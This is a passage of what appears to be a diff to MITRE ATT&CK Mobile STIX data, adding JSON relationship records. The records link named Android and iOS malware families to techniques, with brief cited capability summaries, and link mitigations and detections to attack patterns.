"created": "2020-12-18T20:14:47.302Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has used Firebase for C2 communication.(Citation: WhiteOps TERRACOTTA)", + "modified": "2022-04-18T19:18:56.475Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6086e1e2-1b39-4ff2-910e-4a4eb86d57b7", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BrainTest](https://attack.mitre.org/software/S0293) provided capabilities that allowed developers to use compromised devices to post positive reviews on their own malicious applications as well as download other malicious applications they had submitted to the Play Store.(Citation: Lookout-BrainTest)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--242dc659-c205-4e9e-95f9-14fee66195af", + "created": "2022-04-01T15:29:36.082Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Configuration of per-app VPN policies instead of device-wide VPN can restrict access to internal enterprise resource access via VPN to only enterprise-approved applications", + "modified": "2022-04-01T15:29:36.082Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7ec3ee9a-6710-46ed-aecb-c0f2a64739ad", + "type": "relationship", + "created": "2020-11-20T16:37:28.429Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.429Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect images, videos, and attacker-specified files.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3dff770d-9627-4647-b945-7f24a97b2273", + "type": "relationship", + "created": "2019-09-15T15:26:22.926Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-06-24T15:02:13.533Z", + "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a1023a75-31cc-420a-9c59-b440f7fb27e6", + "type": "relationship", + "created": "2019-11-21T16:42:48.501Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "source_name": "SecureList - ViceLeaker 2019" + }, + { + "source_name": "Bitdefender - Triout 2018", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020." + } + ], + "modified": "2020-01-21T14:20:50.492Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can collect location information, including GPS coordinates.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ad76b0ad-fa76-4d56-8a6e-8818bbc6509e", + "created": "2022-03-30T18:07:07.306Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "On iOS, the `allowEnterpriseAppTrust` and `allowEnterpriseAppTrustModification` configuration profile restrictions can be used to prevent users from installing apps signed using enterprise distribution keys. 
", + "modified": "2022-03-30T18:07:07.306Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c58a26af-cc4c-41a2-b884-9a4fa8a2ad5c", + "type": "relationship", + "created": "2019-09-04T15:38:56.946Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "url": "https://www.flexispy.com/en/features-overview.htm", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019." + } + ], + "modified": "2019-09-10T14:59:26.136Z", + "description": " [FlexiSpy](https://attack.mitre.org/software/S0408) can retrieve a list of installed applications.(Citation: FlexiSpy-Features) ", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--13efc415-5e17-4a16-81c2-64e74815907f", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "PaloAlto-XcodeGhost", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/", + "description": "Claud Xiao. (2015, September 18). 
Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) can prompt a fake alert dialog to phish user credentials.(Citation: PaloAlto-XcodeGhost)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d22d309b-ab00-4f17-b6bf-7706f499cc5e", + "type": "relationship", + "created": "2019-09-03T19:45:48.489Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-09-11T13:25:19.128Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can extract the GPS coordinates of the device.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fada5ba5-7449-4878-b555-82f225473c8b", + "created": "2022-03-30T19:28:42.179Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Attestation can detect unauthorized modifications to devices. Mobile security software can then use this information and take appropriate mitigation action. ", + "modified": "2022-03-30T19:28:42.179Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--271a311f-71bc-4558-a314-0edfbec44b64", + "type": "relationship", + "created": "2019-11-21T16:42:48.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019." 
+ } + ], + "modified": "2019-11-21T16:42:48.495Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) collects device information, including the device model and OS version.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--085f8397-0233-42d7-855e-3dbd709f2eca", + "created": "2023-01-18T21:39:27.823Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:30:43.093Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use the Android “Direct Reply” feature to spread the malware to other devices. 
It can also download the full version of the malware after initial device compromise.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f84355c2-b829-4324-821a-b5148734bb6b", + "created": "2022-04-01T15:21:35.655Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as access to microphone or audio output. ", + "modified": "2022-04-01T15:21:35.655Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e84ad4b0-9f7a-48a5-89ae-33804b11eb56", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. 
Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:12:22.002Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses contact list information.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a92a805e-d5f5-4e94-8592-c253e03e4476", + "created": "2022-03-31T19:51:15.415Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android Package Visibility", + "url": "https://developer.android.com/training/package-visibility", + "description": "Google. (n.d.). Package visibility filtering on Android. Retrieved April 11, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 11 introduced privacy enhancements to package visibility, filtering results that are returned from the package manager. 
iOS 12 removed the private API that could previously be used to list installed applications on non-app store applications.(Citation: Android Package Visibility)", + "modified": "2022-04-11T19:19:34.658Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9398bf9d-be77-4ac2-acea-893152cafd16", + "created": "2022-03-30T14:43:46.034Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T14:43:46.034Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--bd4d32f5-eed4-4018-a649-40b229dd1d69", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a95fe853-d1d1-47dc-a776-b905daacfe32", + "created": "2020-06-26T20:16:32.181Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. 
Retrieved June 26, 2020.", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:11:53.609Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) has used Firebase Cloud Messaging for C2.(Citation: ESET DEFENSOR ID) ", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--66fb8a34-9d48-4599-a56e-19b057380030", + "created": "2023-03-20T18:46:08.304Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:46:08.304Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e9d5992e-04ef-4835-87df-cf6434dcabbc", + "created": "2023-03-20T18:49:38.917Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:49:38.917Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": 
"attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--146275c0-b6dd-4700-bded-bc361a67d023", + "type": "relationship", + "created": "2020-09-14T14:13:45.253Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T14:13:45.253Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) can record audio.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3abc80ad-4ea0-4e91-a170-f040469c2083", + "type": "relationship", + "created": "2020-07-20T13:27:33.483Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." 
+ } + ], + "modified": "2020-08-10T21:57:54.688Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can take photos and videos.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f622a267-7a58-4082-a3f5-10e9bb549a5e", + "created": "2022-03-30T20:43:31.249Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T20:43:31.249Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--8197f026-64da-4700-93b9-b55ba55f3b31", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b30fa851-75cf-46ac-aa1b-cfa8b7f36545", + "created": "2019-09-23T13:36:08.429Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. 
Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:56:23.365Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) processes incoming SMS messages by filtering based on phone numbers, keywords, and regular expressions, focusing primarily on banks, payment systems, and mobile network operators. [Rotexy](https://attack.mitre.org/software/S0411) can also send a list of all SMS messages on the device to the command and control server.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f6a451e8-2125-4bbe-be52-e682523cd169", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. 
Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-10-15T19:37:21.273Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests the device phone number, IMEI, and IMSI.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--36298fd6-d909-4490-8a04-095aef9ffafe", + "type": "relationship", + "created": "2020-11-20T15:54:07.747Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-11-20T15:54:07.747Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can record audio from the microphone and phone calls.(Citation: Symantec GoldenCup) ", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2caddf52-2bc2-4f75-90bb-0f292952ada6", + "created": "2023-01-19T18:07:26.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:13:32.345Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can utilize WebViews to display fake authentication pages that capture user credentials.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ccfffa97-17fd-4826-9a16-c9d8174fb8ac", + "type": "relationship", + "created": "2020-01-27T17:05:58.237Z", + "created_by_ref": 
